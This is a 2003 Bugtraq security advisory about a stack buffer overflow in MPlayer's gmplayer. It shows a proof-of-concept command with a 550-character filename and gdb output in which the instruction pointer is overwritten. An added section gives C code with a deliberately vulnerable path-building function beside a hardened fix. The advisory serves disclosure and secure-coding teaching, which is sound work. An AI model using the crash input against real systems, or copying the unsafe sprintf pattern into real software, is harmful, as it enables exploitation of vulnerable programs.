Bugtraq: Stack Buffer Overflow in MPlayer

Stack Buffer Overflow in MPlayer

From: CoKi <coki_at_interlap.com.ar>
Date: 31 Aug 2003 20:37:45 -0000
-------------------------------------------------
No System Group - Advisory #2 - 01/09/03
-------------------------------------------------
Program: MPlayer - The Movie Player for Linux
Homepage: http://www.mplayerhq.hu
Vulnerable Versions: Mplayer v0.91 and prior
Risk: Low / Medium
Impact: Stack Buffer Overflow
-------------------------------------------------


- DESCRIPTION
-------------------------------------------------
MPlayer is a movie player for LINUX (runs on many
other Unices, and non-x86 CPUs, see the documentation).
It plays most MPEG, VOB, AVI, OGG/OGM, VIVO, ASF/WMA/WMV,
QT/MOV/MP4, FLI, RM, NuppelVideo, YUV4MPEG, FILM, RoQ, PVA
files, supported by many native, XAnim, and Win32 DLL codecs.

More information at: http://www.mplayerhq.hu


- DETAILS
-------------------------------------------------
bash-2.05b$ gmplayer `perl -e 'print "A" x 550'`
Using GNU internationalization
Original domain: messages
Original dirname: /usr/share/locale
Current domain: mplayer
Current dirname: /usr/local/share/locale

Playing
'/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA'
File not found:
'/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA'

MPlayer interrupted by signal 11 in module: unknown
- MPlayer crashed by bad usage of CPU/FPU/RAM.
  Recompile MPlayer with --enable-debug and make a 'gdb' backtrace and
  disassembly. For details, see DOCS/bugreports.html#crash.b.
- MPlayer crashed. This shouldn't happen.
  It can be a bug in the MPlayer code _or_ in your drivers _or_ in your gcc
  version. If you think it's MPlayer's fault, please read DOCS/bugreports.html
  and follow the instructions there. We can't and won't help unless you provide
  this information when reporting a possible bug.

Now we proceed to open gdb to view what may have occurred.

$gdb gmplayer
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
(gdb) r `perl -e 'print "A" x 550'`
Starting program: /usr/local/bin/gmplayer ` perl -e 'print "A" x 550'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...[New Thread 16384 (LWP 2044)]
Using GNU internationalization
Original domain: messages
Original dirname: /usr/share/locale
Current domain: mplayer
Current dirname: /usr/local/share/locale

MPlayer 0.90rc5-3.2.2 (C) 2000-2003 Arpad Gereoffy (see DOCS)

Playing
'/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA'
File not found:
'/home/coki/AAAAAAAAAAAAAAAAAAAAAAA....AAAAAA'

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 2044)]
0x41414141 in ?? ()
(gdb) i r ebp eip esp
ebp 0x41414141 0x41414141
eip 0x41414141 0x41414141
esp 0xbfffd0b0 0xbfffd0b0
(gdb)

Tested in Slackware Linux 9.0

NOTE: The program 'gmplayer' isn't SUID by default.


- SOLUTIONS
-------------------------------------------------
Update the program to the latest version.


- REFERENCES
-------------------------------------------------
http://www.nosystem.com.ar/advisories/advisory-02.txt


- CREDITS
-------------------------------------------------
Discovered by CoKi <coki_at_interlap.com.ar>

No System Group - http://www.nosystem.com.ar
Received on Sep 02 2003
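The crash above (EIP and EBP both 0x41414141 after a 550-byte filename argument) is the signature of a fixed-size stack buffer that receives an attacker-controlled string with no length check: the copy runs over the saved frame pointer and the return address, and the function returns into 0x41414141. The following is an added example of that bug class beside its hardened form; it is illustrative code, not MPlayer's source. The 256-byte buffer size, the cwd-prefixing (suggested only by the "Playing '/home/coki/AAAA...'" output) and the function names are assumptions made for the example.

```c
/* Added example (not MPlayer's code): the bug class the advisory describes,
 * a fixed-size stack buffer that receives an attacker-controlled filename.
 * build_path_unsafe() reproduces the pattern; build_path_safe() is the
 * hardened form. PATH_BUF and the cwd-prefixing are assumptions for
 * illustration, not facts taken from MPlayer's source. */
#include <stdio.h>
#include <string.h>

#define PATH_BUF 256          /* assumed size of the on-stack buffer */

/* Vulnerable pattern: no length check before writing cwd + "/" + name into
 * a 256-byte automatic buffer. With a 550-byte name the copy runs past the
 * buffer, over the saved EBP and the return address; on a 32-bit x86 stack
 * that is how EIP ends up as 0x41414141 when this function returns.
 * Never call this with untrusted input; it is here only to be read. */
void build_path_unsafe(const char *cwd, const char *name)
{
    char path[PATH_BUF];
    sprintf(path, "%s/%s", cwd, name);      /* unbounded write */
    printf("Playing '%s'\n", path);
}

/* Hardened form: compute the required length first, refuse over-long input,
 * and use a bounded formatter. Returns 0 on success, -1 if the result would
 * not fit (including the terminating NUL). */
int build_path_safe(char *out, size_t outsz, const char *cwd, const char *name)
{
    size_t need = strlen(cwd) + 1 + strlen(name) + 1;
    if (need > outsz)
        return -1;
    int n = snprintf(out, outsz, "%s/%s", cwd, name);
    if (n < 0 || (size_t)n >= outsz)    /* defensive: snprintf reports truncation */
        return -1;
    return 0;
}

/* Reproduce the advisory's input: 550 'A's as the filename (constructed here).
 * Returns what build_path_safe() reports for it: -1, i.e. rejected. */
int check_long_name(void)
{
    char name[551];
    memset(name, 'A', 550);
    name[550] = '\0';
    char out[PATH_BUF];
    return build_path_safe(out, sizeof out, "/home/coki", name);
}

/* Sanity check for a normal name: returns 0 if the safe builder produces
 * "/home/coki/movie.avi", non-zero otherwise. */
int check_short_name(void)
{
    char out[PATH_BUF];
    if (build_path_safe(out, sizeof out, "/home/coki", "movie.avi") != 0)
        return 1;
    return strcmp(out, "/home/coki/movie.avi");
}

int main(void)
{
    printf("short name: %s\n", check_short_name() == 0 ? "ok" : "error");
    printf("550-byte name: %s\n", check_long_name() == -1 ? "rejected" : "accepted");
    return 0;
}
```

The length check before the copy is the actual fix; snprintf alone would silently truncate the path, which is safe but hides the fault, so the hardened version reports it to the caller instead. Because gmplayer is not SUID by default (as the advisory notes), a local overflow of this kind gains no privilege on its own; the exposure is a malicious filename or playlist entry handed to a user's own player.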